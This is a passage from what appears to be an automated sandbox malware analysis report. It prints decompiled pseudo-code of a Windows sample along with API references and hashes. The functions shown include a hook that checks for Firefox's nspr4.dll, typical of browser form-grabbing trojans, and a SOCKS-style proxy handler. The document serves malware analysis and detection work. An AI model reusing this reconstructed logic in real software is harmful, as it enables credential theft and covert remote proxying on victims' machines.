					if(E00409F5D( &_v716, L"-v", 0,  &_v92,  &_v20) != 0) {
						E004086CB(_t43,  &_v20, 0x10);
						if(WaitForSingleObject( *(_t35 + 0xc), 0x3e8) == 0) {
							goto L6;
						} else {
							TerminateProcess( *_t43, 0);
							E0040A0A5(_t43);
							goto L3;
						}
					} else {
						L3:
						_t31 = 0;
					}
				} else {
					L6:
					_t31 = 1;
				}
				return _t31;
			}

0x004166a2
0x004166a2
0x004166a5
0x004166b5
0x004166cb
0x004166d1
0x004166de
0x004166f2
0x004166f9
0x00416700
0x0041670e
0x00416711
0x00416714
0x00416736
0x00416743
0x00416758
0x00000000
0x0041675a
0x0041675d
0x00416763
0x00000000
0x00416763
0x00416738
0x00416738
0x00416738
0x00416738
0x0041676a
0x0041676a
0x0041676a
0x0041676a
0x0041676f

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 004166BA
ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 00416714
WaitForSingleObject.KERNEL32(?,000003E8,?,?,00000010,?,004044E0,00000000,?,?), ref: 00416750
TerminateProcess.KERNEL32(?,00000000), ref: 0041675D

Part of subcall function 0040A0A5: CloseHandle.KERNEL32(?,76DDF560,0041B6E2,00000000), ref: 0040A0B4
Part of subcall function 0040A0A5: CloseHandle.KERNEL32(?,76DDF560,0041B6E2,00000000), ref: 0040A0BD

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CloseHandleObjectSingleWait$EventProcessResetTerminate
String ID:
API String ID: 401097067-0
Opcode ID: b0838402bc814c54d54c0570ebd4a9321c089380e24cb43723c2887b0e858123
Instruction ID: 0619fe0f770ffa721af0143ecea3f9a21e336f87051adfc6e6fc83a439d98121
Opcode Fuzzy Hash: b0838402bc814c54d54c0570ebd4a9321c089380e24cb43723c2887b0e858123
Instruction Fuzzy Hash: 9011A571500209AAEB10AFA5DE49FEF77BCAF45704F00447AF505F6095DA389945CA28

Uniqueness

Uniqueness Score: -1.00%

Function 0040C990 Relevance: 6.1, APIs: 4, Instructions: 66
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C990(void* __ecx, void* _a4, int _a8, short* _a12, int* _a16, char** _a20) {
				signed int _v8;
				char* _t39;

				_v8 = _v8 | 0xffffffff;
				 *_a20 = 0;
				if(RegOpenKeyExW(_a4, _a8, 0, 1,  &_a4) != 0) {
					L10:
					return _v8;
				}
				_a8 = 0;
				if(RegQueryValueExW(_a4, _a12, 0, _a16, 0,  &_a8) == 0) {
					_t30 = _a8;
					if(_a8 != 0) {
						_t39 = E0040865F(_t30 + 4);
						if(_t39 != 0) {
							if(RegQueryValueExW(_a4, _a12, 0, _a16, _t39,  &_a8) != 0) {
								E0040868F(_t39);
							} else {
								 *_a20 = _t39;
								_v8 = _a8;
							}
						}
					} else {
						_v8 = 0;
					}
				}
				RegCloseKey(_a4);
				goto L10;
			}

0x0040c997
0x0040c99e
0x0040c9b5
0x0040ca24
0x0040ca29
0x0040ca29
0x0040c9c6
0x0040c9d4
0x0040c9d6
0x0040c9db
0x0040c9eb
0x0040c9ef
0x0040ca04
0x0040ca14
0x0040ca06
0x0040ca09
0x0040ca0e
0x0040ca0e
0x0040ca04
0x0040c9dd
0x0040c9dd
0x0040c9dd
0x0040c9db
0x0040ca1d
0x00000000

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,00000007,?,?,0041AA7A,80000001,00421D38,0042174C,?,?), ref: 0040C9AD
RegQueryValueExW.ADVAPI32(?,0042174C,00000000,00421D38,00000000,?,?,?,?,0041AA7A,80000001,00421D38,0042174C,?,?), ref: 0040C9D0
RegQueryValueExW.ADVAPI32(?,0042174C,00000000,00421D38,00000000,?,00000000,?,?,?,0041AA7A,80000001,00421D38,0042174C,?,?), ref: 0040CA00
RegCloseKey.ADVAPI32(?,?,?,?,0041AA7A,80000001,00421D38,0042174C,?,?), ref: 0040CA1D

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: 58f4f8b3ea1c9415dd9e2ef16f191ab2c6b88d9f86e7a4d9cee4d2a49b994b58
Instruction ID: b749ba6777714500ef3f998adda3104fbe9d598326f03af320599a8b856e9278
Opcode Fuzzy Hash: 58f4f8b3ea1c9415dd9e2ef16f191ab2c6b88d9f86e7a4d9cee4d2a49b994b58
Instruction Fuzzy Hash: 0011427160020DFFDF11CF65DD80D9B3BA9EB883A4B108226FC15AA260D335DA51EB64

Uniqueness

Uniqueness Score: -1.00%

Function 00406DFF Relevance: 6.1, APIs: 4, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00406DFF(void* _a4, WCHAR* _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t16;
				void* _t23;
				void* _t28;
				void* _t30;
				WCHAR* _t34;

				_t11 =  &_a4;
				_push(_t11);
				_push(_a4);
				_t28 = 0;
				L0041C132();
				if(_t11 != 0) {
					_t37 =  &_v160;
					E00412F05(0xa7,  &_v160);
					_push(_a4);
					_t34 =  &_v680;
					_t16 = E00409450(_t37, 0x104, _t34, _t37);
					_pop(_t30);
					if(_t16 > 0) {
						E00412F05(0xa8,  &_v40);
						_t23 = E0040C7E3(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
						if(_t23 != 0 && _t23 != 0xffffffff) {
							PathUnquoteSpacesW(_t34);
							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
							asm("sbb bl, bl");
							_t28 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t28;
			}

0x00406e09
0x00406e0c
0x00406e0d
0x00406e10
0x00406e12
0x00406e19
0x00406e21
0x00406e2c
0x00406e31
0x00406e3c
0x00406e42
0x00406e48
0x00406e4b
0x00406e55
0x00406e6c
0x00406e73
0x00406e7d
0x00406e8a
0x00406e96
0x00406e98
0x00406e98
0x00406e73
0x00406e9d
0x00406ea4
0x00406ea9

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00406E12
LocalFree.KERNEL32(?), ref: 00406E9D

Part of subcall function 0040C7E3: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,00406E71,?,?,00000104), ref: 0040C7F8

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104), ref: 00406E7D
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00406E8A

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
String ID:
API String ID: 2200435814-0
Opcode ID: 89b9dbc200f37237dd3d8f9342c156faa0aea34af738084f0fc6019070bfec83
Instruction ID: e6cfb91868606d07c4407dedc60d499a3fee821b5cb55114a559b186e13e6d73
Opcode Fuzzy Hash: 89b9dbc200f37237dd3d8f9342c156faa0aea34af738084f0fc6019070bfec83
Instruction Fuzzy Hash: 0F11C276640114ABDB10AA69DD09ACF3BADDF89324F004036B849F32A1DB78DD55CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408512 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00408512(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __edi;
				void* _t12;
				intOrPtr _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr _t24;
				void* _t28;
				intOrPtr* _t29;
				intOrPtr _t31;

				if(E00419F02() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x42189c(_a4, 0, _t24, _t29, _t23, _t28, _t17);
					_t13 =  *0x421898(_a4, _a8, _t24, _t29);
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
						EnterCriticalSection(0x420408);
						if(( *0x420420 & 0x00000001) == 0) {
							_t31 =  *_t29;
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
								_t16 = 0;
							} else {
								_t16 = E00416DD3(_t21, _t22, _t31);
							}
							if(_t16 != 0) {
								 *0x420420 =  *0x420420 | 0x00000001;
							}
						}
						LeaveCriticalSection(0x420408);
					}
					return _a4;
				}
				goto ( *0x421898);
			}

0x0040851c
0x00408527
0x0040852b
0x00408535
0x00408545
0x0040854b
0x00408550
0x00408569
0x00408576
0x0040857b
0x0040858b
0x00408596
0x0040858d
0x0040858f
0x0040858f
0x0040859a
0x0040859c
0x0040859c
0x0040859a
0x004085a4
0x004085a4
0x004085b1
0x004085b1
0x0040851f

APIs

Part of subcall function 00419F02: WaitForSingleObject.KERNEL32(00000000,0040506D,00405103,00000000), ref: 00419F0A

EnterCriticalSection.KERNEL32(00420408), ref: 00408569
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00408583
LeaveCriticalSection.KERNEL32(00420408), ref: 004085A4

Strings

nspr4.dll, xrefs: 0040857D

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalSection$EnterLeaveObjectSingleWaitlstrcmpi
String ID: nspr4.dll
API String ID: 3081114022-741017701
Opcode ID: 901e44ae075191787afdf79fa156bcc899b03d4e638cb611cca6a0c41f0471f8
Instruction ID: 0a1bca07755f674646d9008992c4c420c62a4e1e0d4f640c5136d7f22eb5c62f
Opcode Fuzzy Hash: 901e44ae075191787afdf79fa156bcc899b03d4e638cb611cca6a0c41f0471f8
Instruction Fuzzy Hash: 09118231201215FBCB216F11AE84BAB3BA8EF55754F00403EFE84B63A1CB79D842C65C

Uniqueness

Uniqueness Score: -1.00%

Function 00405336 Relevance: 6.0, APIs: 4, Instructions: 45
threadsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405336(void* __eflags) {
				void* _t1;
				void* _t2;
				void* _t3;
				long _t6;
				void* _t11;

				_t1 = E00419DD8(_t11, __eflags, 0x19367400, 1);
				_t19 = _t1;
				if(_t1 != 0) {
					_t2 = E00419F02();
					__eflags = _t2;
					if(_t2 != 0) {
						SetThreadPriority(GetCurrentThread(), 0xfffffff1);
						_t6 = WaitForSingleObject( *0x421d2c, 0x1388);
						while(1) {
							__eflags = _t6 - 0x102;
							if(_t6 != 0x102) {
								goto L6;
							}
							E004051BF();
							_t6 = WaitForSingleObject( *0x421d2c, 0x1388);
						}
					}
					L6:
					E0040BE5B(_t19);
					_t3 = 0;
					__eflags = 0;
				} else {
					_t3 = _t1 + 1;
				}
				return _t3;
			}

0x00405347
0x0040534c
0x00405350
0x00405355
0x0040535a
0x0040535c
0x00405367
0x0040537f
0x00405396
0x00405396
0x00405398
0x00000000
0x00000000
0x00405388
0x00405394
0x00405394
0x00405396
0x0040539a
0x0040539b
0x004053a0
0x004053a0
0x00405352
0x00405352
0x00405352
0x004053a9

APIs

Part of subcall function 00419DD8: CreateMutexW.KERNEL32(004218A0,00000000,?,?,?,?), ref: 00419DF9

GetCurrentThread.KERNEL32 ref: 00405360
SetThreadPriority.KERNEL32(00000000), ref: 00405367
WaitForSingleObject.KERNEL32(00001388), ref: 0040537F

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Thread$CreateCurrentMutexObjectPrioritySingleWait
String ID:
API String ID: 3441234504-0
Opcode ID: 80a3829b95846fa7f6d17df047f9ca8edc4630ae1b81e0c227020cc9163901c5
Instruction ID: d911eb8d1f28adbeedd6213379a371f5c0623b05230e04bfda2f79dd2083a4d7
Opcode Fuzzy Hash: 80a3829b95846fa7f6d17df047f9ca8edc4630ae1b81e0c227020cc9163901c5
Instruction Fuzzy Hash: 5DF0467220860C6AD72137756C058AB371CC7143A5B28023BFD15F22F29DB95C0249AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040BDF5 Relevance: 6.0, APIs: 4, Instructions: 42
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BDF5(HANDLE* _a4) {
				struct tagMSG _v28;
				long _t16;

				while(1) {
					_t16 = MsgWaitForMultipleObjects(1, _a4, 0, 0xffffffff, 0x4ff);
					if(_t16 != 1) {
						break;
					}
					while(PeekMessageW( &_v28, 0, 0, 0, 1) != 0) {
						if(_v28.message != 0x12) {
							TranslateMessage( &_v28);
							DispatchMessageW( &_v28);
							continue;
						}
						goto L5;
					}
				}
				L5:
				return _t16;
			}

0x0040be3c
0x0040be48
0x0040be4d
0x00000000
0x00000000
0x0040be28
0x0040be10
0x0040be17
0x0040be22
0x00000000
0x0040be22
0x00000000
0x0040be10
0x0040be28
0x0040be50
0x0040be58

APIs

PeekMessageW.USER32 ref: 0040BE32
MsgWaitForMultipleObjects.USER32 ref: 0040BE46

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: MessageMultipleObjectsPeekWait
String ID:
API String ID: 3986374578-0
Opcode ID: efb35f9d0de67151a6079ffacb2ce0186b41d1be858d1beb56a6d38e6ff61384
Instruction ID: d55ab1ff64ee7c4aff36d31a26ee17ed4567123fdb7c345ab11780b6605d6b66
Opcode Fuzzy Hash: efb35f9d0de67151a6079ffacb2ce0186b41d1be858d1beb56a6d38e6ff61384
Instruction Fuzzy Hash: 24F0F6325043096BD710ABA9DC48DA7BB9CEB457A4F44093AFB00F31B0D376D94486F9

Uniqueness

Uniqueness Score: -1.00%

Function 00415C9B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00415C9B(void* __eflags, signed int _a4) {
				char _v9;
				char _v13;
				char _v20;
				signed int _v24;
				signed int _v29;
				short _v31;
				signed char _v32;
				intOrPtr _v36;
				signed int _v48;
				short _v50;
				char _v52;
				char _v312;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t59;
				void* _t61;
				short _t77;
				void* _t79;
				void* _t84;
				char _t103;
				char* _t105;
				signed int _t115;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				char _t129;
				void* _t131;
				intOrPtr _t132;
				void* _t133;

				_t110 = _a4;
				_t59 = E0040BC42(_t110);
				_push(0);
				_push( &_v32);
				_t61 = 7;
				_v24 = 0 | _t59 == 0x00000017;
				if(E0040B5F4(_t61, _t110) != 0) {
					while(E0040B5F4(1, _t110,  &_v9, 0) != 0) {
						if(_v9 == 0) {
							_t115 = _v29;
							_t116 = _t115 << 0x10;
							_v13 = 0x5a;
							if(((_t115 & 0x00ff0000 | _t115 >> 0x00000010) >> 0x00000008 | (_t115 & 0x0000ff00 | _t115 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
								L20:
								_v9 = 1;
								if(_v13 != 0x5a) {
									L44:
									return E00415C25(_t110, 0xffffffff, _v13, _v24) & 0xffffff00 | _t73 != 0x00000000;
								}
								E00408742( &_v52,  &_v52, 0, 0x10);
								_t77 = 2;
								_v52 = _t77;
								_t79 = (_v32 & 0x000000ff) - 1;
								if(_t79 == 0) {
									_v50 = _v31;
									_v48 = _v29;
									_t127 = E0040B689( &_v52);
									if(_t127 == 0xffffffff) {
										L23:
										_v13 = 0x5b;
										goto L44;
									}
									E0040BA83(_t116, _t127);
									_t84 = E00415C25(_t110, _t127, 0x5a, _v24);
									if(_t84 != 1) {
										if(_t84 != 0xffffffff) {
											_v9 = 0;
										} else {
											_v13 = 0x5b;
										}
									} else {
										_push(_t127);
										_t84 = E0040B884(_t110);
									}
									E0040BA2B(_t84, _t127);
									if(_v9 != 1 || _v13 == 0x5a) {
										L34:
										return _v9;
									} else {
										goto L44;
									}
								}
								if(_t79 == 1) {
									_t129 = E0040B783( &_v52, 1);
									_v20 = _t129;
									if(_t129 == 0xffffffff) {
										goto L23;
									}
									_t125 = E00415C25(_t110, _t129, 0x5a, _v24);
									if(_t125 != 1) {
										L31:
										E0040BA2B(_t89, _t129);
										if(_t125 == 0xffffffff) {
											goto L23;
										}
										if(_t125 != 1) {
											_v9 = 0;
										}
										goto L34;
									}
									_t126 = E0040B9FB( &_v20,  &_a4);
									_v36 = _t126;
									E0040BA2B(_t93, _v20);
									if(_t126 != 0xffffffff) {
										E0040BA83(_t116, _t126);
										_t110 = _a4;
										_t125 = E00415C25(_a4, _t126, 0x5a, _v24 | 0x00000002);
										if(_t125 == 1) {
											_push(_v36);
											_t89 = E0040B884(_t110);
										}
										_t129 = _v36;
										goto L31;
									}
									_t110 = _a4;
									_v13 = 0x5b;
									goto L44;
								}
								goto L23;
							}
							_t131 = 0;
							while(1) {
								_t116 = _t110;
								if(E0040B5F4(1, _t110,  &_v9, 0) == 0) {
									goto L1;
								}
								_t103 = _v9;
								 *((char*)(_t133 + _t131 - 0x134)) = _t103;
								if(_t103 == 0) {
									_t105 =  &_v312;
									_v20 = 0;
									__imp__getaddrinfo(_t105, 0, 0,  &_v20);
									if(_t105 == 0) {
										_t132 = _v20;
										while(_t132 != 0) {
											if( *((intOrPtr*)(_t132 + 4)) == 2) {
												E004086CB( &_v29,  *((intOrPtr*)(_t132 + 0x18)) + 4, 4);
												L19:
												__imp__freeaddrinfo(_v20);
												if(_t132 == 0) {
													goto L12;
												}
												goto L20;
											}
											_t132 =  *((intOrPtr*)(_t132 + 0x1c));
										}
										goto L19;
									}
									L12:
									_v13 = 0x5b;
									goto L20;
								}
								_t131 = _t131 + 1;
								if(_t131 <= 0xff) {
									continue;
								}
								goto L1;
							}
							goto L1;
						}
					}
				}
				L1:
				return 0;
			}

0x00415ca5
0x00415cab
0x00415cbb
0x00415cbf
0x00415cc2
0x00415cc3
0x00415ccf
0x00415cde
0x00415cdc
0x00415cf3
0x00415d0c
0x00415d1a
0x00415d23
0x00415dad
0x00415db1
0x00415db5
0x00415ee3
0x00000000
0x00415ef3
0x00415dc2
0x00415dc9
0x00415dca
0x00415dd2
0x00415dd3
0x00415e87
0x00415e91
0x00415e99
0x00415e9e
0x00415ddc
0x00415ddc
0x00000000
0x00415ddc
0x00415ea5
0x00415eb1
0x00415eb9
0x00415ec6
0x00415ece
0x00415ec8
0x00415ec8
0x00415ec8
0x00415ebb
0x00415ebb
0x00415ebc
0x00415ebc
0x00415ed2
0x00415edb
0x00415e79
0x00000000
0x00000000
0x00000000
0x00000000
0x00415edb
0x00415dda
0x00415def
0x00415df1
0x00415df7
0x00000000
0x00000000
0x00415e05
0x00415e0a
0x00415e62
0x00415e62
0x00415e6a
0x00000000
0x00000000
0x00415e73
0x00415e75
0x00415e75
0x00000000
0x00415e73
0x00415e1c
0x00415e1e
0x00415e21
0x00415e29
0x00415e38
0x00415e40
0x00415e50
0x00415e55
0x00415e57
0x00415e5a
0x00415e5a
0x00415e5f
0x00000000
0x00415e5f
0x00415e2b
0x00415e2e
0x00000000
0x00415e2e
0x00000000
0x00415dda
0x00415d29
0x00415d2b
0x00415d33
0x00415d3c
0x00000000
0x00000000
0x00415d3e
0x00415d41
0x00415d4a
0x00415d60
0x00415d67
0x00415d6a
0x00415d72
0x00415d7a
0x00415d88
0x00415d83
0x00415d9b
0x00415da0
0x00415da3
0x00415dab
0x00000000
0x00000000
0x00000000
0x00415dab
0x00415d85
0x00415d85
0x00000000
0x00415d8c
0x00415d74
0x00415d74
0x00000000
0x00415d74
0x00415d4c
0x00415d53
0x00000000
0x00000000
0x00000000
0x00415d55
0x00000000
0x00415d2b
0x00415cdc
0x00415cde
0x00415cd1
0x00000000

APIs

Part of subcall function 0040BC42: getsockname.WS2_32(?,?,?), ref: 0040BC60

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00415D6A
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00415DA3

Part of subcall function 0040BA83: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040BA99

Part of subcall function 00415C25: getpeername.WS2_32(000000FF,00000000,00000000), ref: 00415C49

Part of subcall function 0040B884: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 0040B924

Strings

Z, xrefs: 00415EDD

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: freeaddrinfogetaddrinfogetpeernamegetsocknameselectsetsockopt
String ID: Z
API String ID: 1849152701-1505515367
Opcode ID: 1ff825034f7ed0c5d05da68e7954f180c114dfb367cfec25db8688365985bc11
Instruction ID: a2b59edd8afa2070b818c5049491ee6797b5d9535d41d7793b0c29f3166475b5
Opcode Fuzzy Hash: 1ff825034f7ed0c5d05da68e7954f180c114dfb367cfec25db8688365985bc11
Instruction Fuzzy Hash: 03611831E00A04EADF20ABA4DC45AEF77B99B85314F14466BF851F72C1D73C8A8187AD

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3E2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0041A3E2(void* __eflags, signed char _a4) {
				signed int _v8;
				char _v20;
				char _v44;
				char _v56;
				char _v68;
				void* __edi;
				void* __esi;
				void* _t20;
				signed int _t22;
				CHAR* _t38;
				intOrPtr* _t39;
				WCHAR* _t41;
				struct HINSTANCE__* _t42;
				char* _t44;

				_t41 =  &_v44;
				E00412F05(0xc0, _t41);
				_t42 = GetModuleHandleW(_t41);
				if(_t42 != 0) {
					_t38 =  &_v20;
					E00412ECF(0xc1, _t38);
					_t39 = GetProcAddress(_t42, _t38);
					if(_t39 == 0) {
						L10:
						_t20 = 0;
						L7:
						return _t20;
					}
					_v8 = _v8 & 0x00000000;
					_t22 = _a4 & 0x000000ff;
					if(_t22 == 0) {
						_t43 =  &_v68;
						E00412F05(0xb2,  &_v68);
						_push(0x1e6);
						_push("0xCFB42BF2");
						if(E004094CB( &_v8, _t43, 0x2000800) > 0) {
							L6:
							 *_t39(0, _v8, "#", 0x10040);
							E0040868F(_v8);
							_t20 = 1;
							goto L7;
						}
						goto L10;
					}
					if(_t22 == 1) {
						_t44 =  &_v56;
						E00412F05(0xb3, _t44);
						_push(_t44);
						_v8 = E00408A4D(0x11);
					}
					goto L6;
				}
				return 0;
			}

0x0041a3e9
0x0041a3f1
0x0041a3ff
0x0041a403
0x0041a40a
0x0041a412
0x0041a421
0x0041a425
0x0041a4a2
0x0041a4a2
0x0041a46d
0x00000000
0x0041a46d
0x0041a42b
0x0041a42f
0x0041a432
0x0041a473
0x0041a47b
0x0041a480
0x0041a485
0x0041a4a0
0x0041a452
0x0041a461
0x0041a466
0x0041a46b
0x00000000
0x0041a46b
0x00000000
0x0041a4a0
0x0041a435
0x0041a437
0x0041a43f
0x0041a446
0x0041a44f
0x0041a44f
0x00000000
0x0041a435
0x00000000

APIs

GetModuleHandleW.KERNEL32(?), ref: 0041A3F9
GetProcAddress.KERNEL32(00000000,?), ref: 0041A41B

Strings

0xCFB42BF2, xrefs: 0041A485

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: 0xCFB42BF2
API String ID: 1646373207-288516968
Opcode ID: 6102e417e668d5f028c7d84c5fb21b3f59b923265c0f51a2130591d8c8757001
Instruction ID: 4cf8654c6c13e69b81272f304b394fdc8eea0739b508c0dc4c877d785f0b5ba4
Opcode Fuzzy Hash: 6102e417e668d5f028c7d84c5fb21b3f59b923265c0f51a2130591d8c8757001
Instruction Fuzzy Hash: 16110876A01314B7EB1077A59E0ABEF3668DB40740F110026FD01F7281D6BCDE9696AE

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD2B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040CD2B(void* __ecx, intOrPtr _a4, intOrPtr _a12, signed char _a16) {
				signed int _v14;
				signed int _v16;
				signed int _v20;
				char _v284;
				unsigned int _t24;
				void* _t26;
				signed int _t28;
				signed int* _t29;
				void* _t30;
				void* _t41;
				char* _t42;
				void* _t45;
				signed int _t46;
				void* _t47;

				_t45 = __ecx;
				_t24 = E004086CB( &_v20, _a4, 0x10);
				_v20 = _v20 ^ _t24;
				_v16 = _v16 ^ _t24;
				_v14 = _v14 ^ _t24 >> 0x00000010;
				_t41 = 0;
				_t26 = 0;
				do {
					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t26 + 0xc);
					_t26 = _t26 + 1;
					if(_t26 == 4) {
						_t26 = 0;
					}
					_t41 = _t41 + 1;
				} while (_t41 < 8);
				if(_a12 != 0) {
					E004086CB( &_v284, _a12, 0x102);
					E00409C04( &_v284, _t41,  &_v20, 0x10);
				}
				_t28 = _a16 & 0x000000ff;
				if(_t28 != 0) {
					_t30 = _t28 - 1;
					if(_t30 == 0) {
						_t42 = L"Local\\";
						_push(6);
						goto L11;
					} else {
						if(_t30 == 1) {
							_t42 = L"Global\\";
							_push(7);
							L11:
							_pop(_t46);
							E00408A32(_t46, _t42, _t45);
							_t45 = _t45 + _t46 * 2;
						}
					}
				}
				_t29 =  &_v20;
				__imp__StringFromGUID2(_t29, _t45, 0x28);
				return _t29;
			}

0x0040cd3b
0x0040cd41
0x0040cd46
0x0040cd49
0x0040cd50
0x0040cd54
0x0040cd56
0x0040cd58
0x0040cd5c
0x0040cd60
0x0040cd64
0x0040cd66
0x0040cd66
0x0040cd68
0x0040cd69
0x0040cd72
0x0040cd83
0x0040cd94
0x0040cd94
0x0040cd9d
0x0040cda0
0x0040cda2
0x0040cda3
0x0040cdb1
0x0040cdb6
0x00000000
0x0040cda5
0x0040cda6
0x0040cda8
0x0040cdad
0x0040cdb8
0x0040cdb8
0x0040cdbd
0x0040cdc2
0x0040cdc2
0x0040cda6
0x0040cda3
0x0040cdc8
0x0040cdcc
0x0040cdd5

APIs

StringFromGUID2.OLE32(00000000,?,00000028,?,00000002,00000010,00000000), ref: 0040CDCC

Strings

Local\, xrefs: 0040CDB1
Global\, xrefs: 0040CDA8

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: FromString
String ID: Global\$Local\
API String ID: 1694596556-639276846
Opcode ID: c1a9b1dc1befae3bfb6a7868834038c94bb63409421baf34331963c802ba3196
Instruction ID: 927ca6c03f253be2eb886c0d9a5347624e4af0d666557f4cc36ead0dee5948d0
Opcode Fuzzy Hash: c1a9b1dc1befae3bfb6a7868834038c94bb63409421baf34331963c802ba3196
Instruction Fuzzy Hash: 7111E23261025EA6DF14EB748C86BEF3A69EF44700F00893BE542F61C1EAB89545D798

Uniqueness

Uniqueness Score: -1.00%

Function 00417ED1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00417ED1(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v52;
				char _v572;
				void* __edi;
				void* __esi;
				void* _t17;
				char* _t22;
				signed int _t30;
				char* _t32;
				void* _t34;

				_t32 =  &_v52;
				_t17 = 0x57;
				E00412F05(_t17, _t32);
				_v16 = _t32;
				_v28 = 0x26;
				_v24 = 0x1a;
				_v20 = 0x23;
				E00408742( &_v12,  &_v12, 0, 8);
				_t30 = 0;
				do {
					_t22 =  &_v572;
					__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t34 + _t30 * 4 - 0x18)), 0, 0, _t22);
					_t37 = _t22;
					if(_t22 == 0) {
